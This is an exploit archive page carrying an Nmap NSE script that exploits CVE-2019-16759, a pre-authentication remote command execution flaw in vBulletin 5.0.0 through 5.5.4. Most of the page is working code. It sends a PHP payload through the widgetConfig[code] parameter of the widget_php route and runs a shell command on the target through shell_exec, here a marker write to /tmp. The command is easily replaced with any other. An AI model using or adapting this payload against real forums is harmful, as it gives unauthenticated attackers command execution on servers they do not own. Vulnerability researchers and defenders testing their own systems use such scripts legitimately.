vBulletin 5.x 0-Day Pre-Auth Remote Command Execution

vBulletin 5.x 0-Day Pre-Auth Remote Command Execution: Posted Sep 26, 2019; Authored by r00tpgp; Nmap NSE script that exploits a pre-authentication remote command execution vulnerability in vBulletin versions 5.x.; tags | exploit, remote; advisories | CVE-2019-16759; SHA-256 | 73ddb2f66da505ef87985f77f0bb71fc85619bd1e57d88f061543246f1899c3c; Download | Favorite | View

vBulletin 5.x 0-Day Pre-Auth Remote Command Execution

description = [[
vBulletin 5.x 0day pre-auth RCE exploit
This should work on all versions from 5.0.0 till 5.5.4
]]

local http = require "http"
local shortport = require "shortport"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"

---
-- @usage
-- nmap -p <port> --script http-vuln-CVE-2019-16759 <target>
--
-- @output
-- PORT    STATE SERVICE
-- s4430/tcp  open  http
-- | http-vuln-CVE-2019-16759:
-- |   VULNERABLE
-- |   vBulletin 5.x 0day pre-auth RCE exploit
-- |     State: VULNERABLE
-- |     IDs:  CVE:CVE-2019-16759
-- |
-- |     Disclosure date: 2019-09-23
-- |     References:
-- |      https://seclists.org/fulldisclosure/2019/Sep/31
-- |_     https://nvd.nist.gov/vuln/detail/CVE-2019-16759
--
-- @args http-vuln-cve2019-16759.path The default URL path to request. The default is "/".

author = "r00tpgp"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "vuln" }

portrule = shortport.http

action = function(host, port)
  local vuln = {
    title = "vBulletin 5.x 0day pre-auth RCE exploit",
    state = vulns.STATE.NOT_VULN,
    description = [[
vBulletin 5.x 0day pre-auth RCE exploit
This should work on all versions from 5.0.0 till 5.5.4
    ]],
    IDS = {
        CVE = "CVE-2019-16759"
    },
    references = {
        'https://seclists.org/fulldisclosure/2019/Sep/31',
'https://nvd.nist.gov/vuln/detail/CVE-2019-16759',
    },
    dates = {
        disclosure = { year = '2019', month = '09', day = '23' }
    }
  }

  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)

  local method = stdnse.get_script_args(SCRIPT_NAME..".method") or "POST"
  local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/index.php?routestring=ajax/render/widget_php"

  local body = {
   ["widgetConfig[code]"] = "echo shell_exec(\'echo h4x0000r > /tmp/nmap.check.out; cat /tmp/nmap.check.out\');exit;",
  }

   local options = {
    header = {
      Connection = "close",
      ["Content-Type"] = "application/x-www-form-urlencoded",
      ["User-Agent"] =  "curl/7.65.3",
      ["Accept"] = "*/*",
    },
    content = body
}
  local response = http.post(host, port, path, nil, nil, body)

  if response and string.match(response.body, "h4x0000r") then
    vuln.state = vulns.STATE.VULN
  end

  return vuln_report:make_output(vuln)
end

Top Authors In Last 30 Days

Red Hat 184 files
Ubuntu 64 files
Debian 22 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Google Security Research 6 files
Apple 6 files
malvuln 4 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,009)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,174)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,460)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,433)
UNIX (9,390)
UnixWare (187)
Windows (6,648)
Other

vBulletin 5.x 0-Day Pre-Auth Remote Command Execution

vBulletin 5.x 0-Day Pre-Auth Remote Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

vBulletin 5.x 0-Day Pre-Auth Remote Command Execution

Share This

vBulletin 5.x 0-Day Pre-Auth Remote Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems